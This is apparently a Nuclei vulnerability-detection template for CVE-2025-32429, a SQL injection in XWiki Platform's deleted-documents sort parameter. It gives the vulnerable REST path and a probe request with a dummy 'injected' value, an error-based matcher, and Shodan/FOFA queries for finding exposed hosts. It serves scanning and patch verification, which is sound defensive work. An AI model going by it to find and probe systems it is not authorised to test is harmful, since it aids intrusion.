id: CVE-2025-32429

info:
  name: XWiki Platform - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In versions 9.4-rc-1 through 16.10.5 and 17.0.0-rc-1 through 17.2.2, it's possible for anyone to inject SQL through the sort parameter of getdeleteddocuments.vm, whose value is used as-is as an ORDER BY clause.
  impact: |
    Authenticated attackers with access to the deleted documents trash feature could inject SQL code, leading to data leakage, database modification, or further compromise of the application.
  remediation: |
    Upgrade to XWiki Platform version 16.10.6 or 17.3.0-rc-1 (or newer), which addresses this vulnerability. Always validate and sanitize user-controlled input used in query parameters.
  reference:
    - https://jira.xwiki.org/browse/XWIKI-23093
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32429
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-32429
    epss-score: 0.34913
    epss-percentile: 0.97111
    cwe-id: CWE-89
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: xwiki
    product: xwiki
    shodan-query: html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2025,xwiki,hqli,sqli,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/xwiki/rest/liveData/sources/liveTable/entries?sourceParams.template=getdeleteddocuments.vm&sort=injected"

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Exception", "org.xwiki.livedata.LiveDataException", "HqlQueryScriptService")'
          - 'contains(content_script_type, "text/javascript")'
          - 'status_code == 500'
        condition: and
# digest: 4a0a00473045022056c8e501f55c89fb644d0b503c217d63f2ccd3a0c55b699f04b3c286fd7d806d022100cedbeb549b675d1feace37eda720c3d92f69cb4eab53717d23391372d108ecf9:922c64590222798bb761d5b6d8e72950